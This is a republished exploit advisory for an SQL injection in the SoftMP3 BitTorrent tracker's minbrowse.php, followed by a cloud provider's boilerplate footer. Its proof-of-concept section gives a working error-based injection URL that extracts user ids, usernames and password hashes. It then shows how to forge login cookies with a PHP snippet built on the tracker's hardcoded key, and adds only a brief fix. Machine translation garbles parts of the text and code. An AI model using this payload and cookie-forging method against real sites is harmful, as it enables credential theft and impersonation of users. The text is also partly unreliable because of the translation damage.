SoftMP3 SQL Injection defects and repair

Source: Internet
Author: User

# Exploit Title: SOFTMP3 source code SQL injection

# Date: 23/04/2011

# Author: mArTi

# Software Link: http://softmp3.org/

# Version: No others versions available...

# Tested on: Windows/Unix

/................................... /Introduction /.................................../

SoftMP3 released a source code of its bittorent tracker when it died. This source code is vulnerable to a SQL injection.

Heres the PoC and the Fix

/................................... /PoC /.................................../

-> SQL http://www.bkjia.com/SOFTMP3/minbrowse.php? Search = string and (select 1 from (select count (*), concat (select concat (0x7e, 0x27, users. id, 0x27, users. username, 0x27, users. passhash, 0x27, 0x7e) FROM 'database '. users where id = 1 LIMIT 0, 1) from information_schema.tables limit 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x) a) and 1 = 1"

-----> Then you can use this to connect as the user you want by the passhash you got and setting the following cookies:

Uid = id

Pass = encrypted passhash (see down)

---------> Getting encrypted passhash to connect with the cookies

<? Php

$ Test = md5 ($ HTTP_SERVER_VARS ["REMOTE_ADDR"]. "passhash". "hejsan". $ HTTP_SERVER_VARS ["REMOTE_ADDR"]);

Echo "pass cookie is $ test"

?>

/................................... /FIX (Repair Measures) /.................................../

Delete/minbrowse. php (useless ).

BTW, if you want to protect the cookies, just change the cookie encryption in bittorent. php file (like the "hejsan" key or the order of terms in encryption)

Certificate quota --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Protect yourself against the security breaks in your security to protect your users and your site. If you want to contact me, youll know where to find me.

 

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.